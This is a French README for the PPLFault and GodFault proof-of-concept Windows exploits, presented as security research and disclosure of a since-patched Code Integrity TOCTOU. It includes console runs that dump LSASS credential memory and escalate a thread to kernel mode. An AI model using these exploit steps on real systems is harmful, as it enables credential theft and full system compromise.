
Exploit d'élévation de privilèges Windows exploitant un TOCTOU dans Code Integrity pour contourner Protected Process Light, s'exécuter en tant que WinTcb-Light et extraire les processus protégés (p. ex., LSASS).
Par Gabriel Landau chez Elastic Security.
De PPLdump Is Dead. Long Live PPLdump! présenté à Black Hat Asia 2023.
PPLdump Is Dead. Long Live PPLdump!
MISE À JOUR 2024-02 : Microsoft a corrigé PPLFault le 2024-02-13. Voir ce fil pour la discussion associée.
Exploite un TOCTOU dans Windows Code Integrity pour parvenir à une exécution de code arbitraire en tant que WinTcb-Light, puis déverse un processus spécifié. Pour plus de détails sur l'exploit, consultez mes diapositives et/ou présentation.
PS C:\Users\user\Desktop> cmd /c ver
Microsoft Windows [Version 10.0.25346.1001]
PS C:\Users\user\Desktop> tasklist | findstr lsass
lsass.exe 992 Services 0 76,620 K
PS C:\Users\user\Desktop> (Get-NtProcess -Access QueryLimitedInformation -Pid 992).Protection
Type Signer
---- ------
ProtectedLight Lsa
PS C:\Users\user\Desktop> dir *.dmp
PS C:\Users\user\Desktop> .\PPLFault.exe -v 992 lsass.dmp
[+] No cleanup necessary. Backup does not exist.
[+] GetShellcode: 528 bytes of shellcode written over DLL entrypoint
[+] Benign: C:\Windows\System32\EventAggregation.dll.bak
[+] Payload: C:\PPLFaultTemp\PPLFaultPayload.dll
[+] Placeholder: C:\PPLFaultTemp\EventAggregationPH.dll
[+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll
[+] Ready. Spawning WinTcb.
[+] SpawnPPL: Waiting for child process to finish.
[+] FetchDataCallback called.
[+] Hydrating 90112 bytes at offset 0
[+] Switching to payload
[+] Emptying system working set
[+] Working set purged
[+] Give the memory manager a moment to think
[+] Hydrating 90112 PAYLOAD bytes at offset 0
[+] Dump saved to: lsass.dmp
[+] Dump is 74.9 MB
[+] Operation took 937 ms
PS C:\Users\user\Desktop> dir *.dmp
Directory: C:\Users\user\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/1/2023 11:18 AM 78581973 lsass.dmp
Exploite le même TOCTOU que PPLFault. Toutefois, au lieu de déverser un processus, il migre vers CSRSS et exploite une vulnérabilité dans win32k!NtUserHardErrorControlCall de ANGRYORCHARD pour décrémenter KTHREAD.PreviousMode de UserMode (1) à KernelMode (0). Il prouve l'accès « God Mode » en ouvrant \Device\PhysicalMemory, normalement inaccessible depuis UserMode, avec SECTION_ALL_ACCESS.
C:\Users\user\Desktop>GodFault.exe -v
[?] Server does not appear to be running. Attempting to install it...
[+] No cleanup necessary. Backup does not exist.
[+] GetShellcode: 2304 bytes of shellcode written over DLL entrypoint
[+] CSRSS PID is 772
[+] Benign: C:\Windows\System32\EventAggregation.dll.bak
[+] Payload: C:\GodFaultTemp\GodFaultPayload.dll
[+] Placeholder: C:\GodFaultTemp\EventAggregationPH.dll
[+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll
[+] Testing initial ability to acquire PROCESS_ALL_ACCESS to System: Failure
[+] Ready. Spawning WinTcb.
[+] SpawnPPL: Waiting for child process to finish.
[+] FetchDataCallback called.
[+] Hydrating 90112 bytes at offset 0
[+] Switching to payload
[+] Emptying system working set
[+] Working set purged
[+] Give the memory manager a moment to think
[+] Hydrating 90112 PAYLOAD bytes at offset 0
[+] Thread 6248 (KTHREAD FFFFA283B0A62080) has been blessed
[+] Testing post-exploit ability to acquire PROCESS_ALL_ACCESS to System: Success
[+] Opened \Device\PhysicalMemory. Handle is 0x1b4
[+] Opened System process as PROCESS_ALL_ACCESS. Handle is 0x1c0
[+] Press any key to continue...
[+] No cleanup necessary. Backup does not exist.
PoC qui permet d'obtenir une exécution de code arbitraire en tant que WinTcb-Light sans l'API CloudFilter. Voir python/README.md.
| Windows 11 22H2 22621.1702 (May 2023) | Windows 11 Insider Canary 25346.1001 (April 2023) | |
|---|---|---|
| PPLFault | ✔️ | ✔️ |
| GodFault | ✔️ | ❌ Atténuation PreviousMode Insider bugchecks |
PPLFault est couvert par la licence ELv2. Il utilise phnt de SystemInformer sous la licence MIT.
Inspiré par PPLdump de Clément Labro, que Microsoft a corrigé en juillet 2022.
ANGRYORCHARD a été créé par Austin Hudson, qui l'a publié lorsque Microsoft a corrigé PPLdump.